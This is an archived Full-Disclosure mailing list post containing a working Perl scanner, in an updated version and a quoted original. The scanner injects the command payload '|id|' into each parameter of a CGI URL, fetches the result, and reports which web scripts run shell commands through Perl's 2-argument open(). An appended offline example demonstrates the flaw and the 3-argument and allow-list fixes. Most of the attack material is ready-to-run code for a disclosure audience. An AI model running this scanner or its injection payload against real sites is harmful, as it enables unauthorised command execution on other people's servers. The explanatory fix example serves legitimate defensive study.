Message-ID: <AANLkTimkEBxKEOVrYClk44BL7M8hkBGFrlGUHgwGEBOz@mail.gmail.com>
Date: Mon, 21 Jun 2010 22:34:10 -0400
From: Marshall Whittaker <marshallwhittaker@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: (Almost) Universal perl CGI exploitation
This has a small bug. Gives false positives on some websites, silly me.
Here's an updated version:
--- code ---
#!/usr/bin/perl
# oxagast
use strict;
use warnings;

if (!defined $ARGV[0] || $ARGV[0] eq "") {
    print " ---=== oxagast's buggy cgi finder ===---\n\n";
    print "Please provide a URL with a CGI script and its args.\n";
    print "ex. $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\"\n";
    exit;
}

# Split the URL into the script path and its query string.
my ($baseurl, $query) = split(/\?/, $ARGV[0], 2);
$query = "" unless defined $query;
my @inputafterquestion = split(/&/, $query);

# Build one test URL per argument, replacing that argument's value with
# |id|: a 2-arg open() on a name that starts or ends with "|" runs it as
# a command, so a vulnerable script returns the output of id(1).
my @urltotest;
for my $thisarg (0 .. $#inputafterquestion) {
    my @pairs = @inputafterquestion;
    my ($name) = split(/=/, $pairs[$thisarg], 2);
    $pairs[$thisarg] = "$name=|id|";
    push @urltotest, "$baseurl?" . join("&", @pairs);
}

my $exploitable = 0;
for my $url (@urltotest) {
    # Call wget directly instead of writing getfile.sh, so the URL is
    # never handed to /bin/sh.
    system("wget", "-q", "-O", "gettmp", $url);
    my @gotstuff;
    if (open(my $fh, "<", "gettmp")) {
        @gotstuff = <$fh>;
        close($fh);
    }
    unlink("gettmp");
    for my $gotline (@gotstuff) {
        # Match "uid=" rather than bare "uid"; the latter gave false positives.
        if ($gotline =~ m/uid=/) {
            my ($uidline) = $gotline =~ m/(uid=.*\))/;
            $uidline = "uid=" unless defined $uidline;
            print "Exploitable...\n";
            print "$url\n";
            print "$uidline\n";
            $exploitable = 1;
            last;    # report only the first matching line for this URL
        }
    }
}
if ($exploitable == 0) {
    print "Sorry, not exploitable...\n";
}
--- code ---
On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker <
marshallwhittaker@...il.com> wrote:
> This works on the perl pipe bug. It'll take an arg that's the address of a
> website and its cgi script with some args to the script then figure out if
> it can exploit it and how. It's worked on everything I've tried it on,
> though I have limited test boxes. It's pretty dirty but it works.
>
> #!/usr/bin/perl
>
> #oxagast
>
> if (@ARGV[0] eq "") {
> print " ---=== oxagast's buggy cgi finder ===---\n\n";
> print "Please provide a URL with a CGI script and it's args.\n";
> print "ex. $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\"\n";
> exit;
> }
>
>
> @urlquestionsplit = split(/\?/, @ARGV[0]);
> $baseurl = @urlquestionsplit[0];
> @inputafterquestion = split(/\&/, @urlquestionsplit[1]);
>
> for $countargs (0..scalar(@inputafterquestion)) {
> $numofargs = $countargs;
> }
>
>
> for $cgiargsplitter (0..$numofargs) {
> @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]);
> push @cgiargsaftereq, @cgiaanda[1];
> }
> for $thisarg (0..$numofargs-1) {
> $wholestring = @urlquestionsplit[1];
> $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/;
> push @urltotest, "$baseurl?$wholestring";
> }
>
>
> for $argnumber (0..$numofargs) {
> system("echo \"wget -q -O gettmp \'@urltotest[$argnumber]\'\" > getfile.sh");
> system("chmod u+x getfile.sh");
> system("./getfile.sh");
> @gotstuff = `cat gettmp`;
> $done = 0;
> $exploitable;
> for $line (0..scalar(@gotstuff)-1) {
> if (@gotstuff[$line] =~ m/uid/) {
> if ($done == 0) {
> $done = 1;
> $firstline = $line;
> @gotstuff[$line] =~ m/.*uid(.*)\).*/;
> $uidline = "uid$1)";
> print "Exploitable...\n";
> print "@urltotest[$argnumber]\n";
> print "$uidline\n";
> unlink(gettemp);
> unlink(getfile.sh);
> $exploitable = 1;
> }
> }
> }
> system("rm gettmp getfile.sh");
> }
> if ($exploitable == 0) {
> print "Sorry, not exploitable...\n";
> }
>
>
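The following is an added example, not code from the original post or from the scanner's author. It shows the CGI pattern the scanner's |id| payload targets (a 2-argument open() on a name built from a query parameter) next to the 3-argument open() that closes it, and runs offline against a temporary directory. It assumes the vulnerable script prepends a directory to the parameter, so the payload's trailing "|" is the one Perl acts on; the data directory and file are constructed here, and the read_file_* function names are hypothetical.

```perl
#!/usr/bin/perl
# Added example, not code from the original post: why the |id| payload works
# against a CGI script that uses Perl's 2-argument open(), and the 3-argument
# form that closes the hole. Runs offline against a temporary directory.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Constructed stand-in for the CGI script's data directory, with one file in it.
my $datadir = tempdir(CLEANUP => 1);
open(my $out, ">", "$datadir/whateverfile.txt") or die "create: $!";
print $out "contents of whateverfile.txt\n";
close($out);

# Vulnerable: 2-arg open() parses the name. "$datadir/|id|" ends in "|",
# so Perl runs "$datadir/|id" through the shell and reads its stdout:
# the "file contents" returned to the client are the output of id(1).
sub read_file_vulnerable {
    my ($file_name) = @_;
    open(my $fh, "$datadir/$file_name") or return "open failed: $!\n";
    my $data = do { local $/; <$fh> };
    close($fh);
    return $data;
}

# Fix for the pipe bug alone: 3-arg open() with an explicit "<" mode treats
# the name as a literal path, so "|id|" is just a file that does not exist.
sub read_file_3arg {
    my ($file_name) = @_;
    open(my $fh, "<", "$datadir/$file_name") or return "open failed: $!\n";
    my $data = do { local $/; <$fh> };
    close($fh);
    return $data;
}

# Hardened: 3-arg open() plus an allow-list on the name, which also stops
# path traversal ("../") and other odd characters the open-mode fix ignores.
sub read_file_hardened {
    my ($file_name) = @_;
    return "rejected: bad file name\n"
        unless $file_name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;
    return read_file_3arg($file_name);
}

# The benign value from the post's example URL, then the scanner's payload.
for my $value ("whateverfile.txt", "|id|") {
    print "file_name=$value\n";
    print "  2-arg open : ", read_file_vulnerable($value);
    print "  3-arg open : ", read_file_3arg($value);
    print "  hardened   : ", read_file_hardened($value);
}
```

Run it as an ordinary user: the 2-arg case prints your own uid/gid line for the |id| value (the shell also complains on stderr that the directory is not executable), while both fixed variants return an open failure or a rejection and never spawn a process. The scanner above keys on exactly that "uid=" line appearing in the HTTP response.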
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/